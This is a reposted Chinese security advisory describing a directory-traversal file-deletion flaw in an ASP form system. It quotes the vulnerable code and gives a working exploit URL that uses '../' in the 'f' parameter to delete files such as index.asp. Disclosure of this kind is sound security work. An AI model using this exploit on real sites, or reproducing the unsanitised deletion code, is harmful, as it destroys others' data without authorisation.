发布日期:2010-07.06
发布作者:不详 影响版本:鼎峰智能表单系统(ASP) V1.0 Mini 漏洞描述:鼎峰智能表单系统(ASP) V1.0 Mini 跨目录删除文件漏洞 elseif Request.QueryString("action")="del" then 'QueryString传输,不多说 f=Request.QueryString("f") ‘也是QueryString,取得“f”变量 if f<>"" then '判断f是否空字符 Set fso=server.createobject("scripting.filesystemobject") fso.DeleteFile Server.MapPath("./dbbak/"&f) '直接引用了“f” set fso=nothing url_go "删除成功!","db_manage.asp" else url_go "没有找到指定文件!","db_manage.asp" end if 而下面的引用为:
<a href="?action=del&f=<%=item.Name%>" onclick="javascript:return confirm('您确定要继续执行该操作吗?');">删除</a> 取得变量“f”,而且f变量是处理的真实文件名(item.Name) 就直接引用在 Server.MapPath("./dbbak/"&f) 执行方法: http://127.0.0.1/diyfrm/manage/db_manage.asp?action=del&f=../../../index.asp TAG标签: 漏洞 鼎峰智能表单系统 删文件漏洞
本文转自 ☆★ 包罗万象网 ★☆ - http://www. 转载请注明出处,侵权必究! 原文链接:http://www./a/net-offense/loophole/2010/0709/1157.html |
|